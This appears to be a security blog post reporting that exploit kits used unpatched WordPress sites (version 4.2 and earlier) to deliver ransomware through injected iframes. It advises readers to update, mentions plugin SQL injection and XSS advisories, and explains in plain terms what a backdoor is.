Unpatched WordPress Sites Used By Exploit Kits

The security firm Zscaler recently detected a large number of WordPress websites that are being used by exploit kits (exploit kits, defined) to deliver ransomware to the sites visitors. Their blog post shows the large scale nature of this issue and how many WordPress websites are currently affected. The attackers are compromising the websites by exploiting vulnerable WordPress sites allowing the installation of backdoors (see Aside below for a definition) and the injection of an Iframe (Iframe, defined) into the legitimate traffic that travels to the victim’s system when they visit the site.

WordPress sites using version 4.2 and earlier can be compromised by the security issues that they contain. Such issues were addressed by WordPress with 4 security updates being released for version 4.2 from April until August this year.

Why Should These Issues Be Considered Important?
Since the visitors to your website may have a chance of their devices becoming infected which may impact the number of visitors to your site and your website’s reputation it is in your interest and to the benefit of your visitors/customers to address these security issues.

How Can I Protect Myself From These Issues?
If your website is powered by WordPress or makes use of WordPress it is recommended to update to the latest version of WordPress which is version 4.3 (at the time of writing). The version of WordPress in question is the self-hosted/self-administered server based installation rather than the WordPress.com version which is administered by WordPress.

As mentioned in a previous blog post, if you have automatic updates enabled for WordPress (available since version 3.7, thanks again to Sophos for that information) this update will be installed for you. Alternatively you can access your WordPress dashboard and choose Updates -> Update Now.

In addition, plugins for WordPress sites such as Symposium, Google Analytics by Yoast Premium and the IFrame plugin of WordPress have also been found to have SQL injection (SQL injection, defined) and cross-site scripting (XSS) (cross-site scripting, defined) vulnerabilities. The security firm dxw Security provide advice and mitigations in the above linked to advisories for each plugin.

I hope that the above advice is useful to you in better securing your WordPress installations/websites from attack.

Thank you.

What is a backdoor?

A backdoor is the general name given to the means for an attacker to conveniently access devices/services within an organization that they would not usually be able to do so e.g. via a command line (shell, Linux shell, Windows Command Prompt both defined).

Such a command shell will allow them to enter commands that the victim device will then carry out. This means of accessing the device/service bypasses access control methods in place to secure the device/service (under more normal circumstances) e.g. passwords, one-time passwords and smart cards etc.

An attacker will usually set up such a backdoor after initially compromising a company (e.g. using a spear phishing email, spear phishing defined) so that they can more conveniently access the company network in the future to carry out further malicious actions.

Another means of accessing the device or service would be via a VPN (e.g. VNC) or Microsoft Remote Desktop Protocol (RDP) that the attacker would have set up to enable easier access in the future. The attacker would usually use compromised credentials from an employee (obtained by some other means) of the company in order to log into the VPN to arouse as little suspicion as possible. An alternative definition of a backdoor is also available here.

Please note that the tools such as VNC and Microsoft RDP (among others) are not malicious in nature but like almost everything in this world, legitimate tools can be used for malicious purposes.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.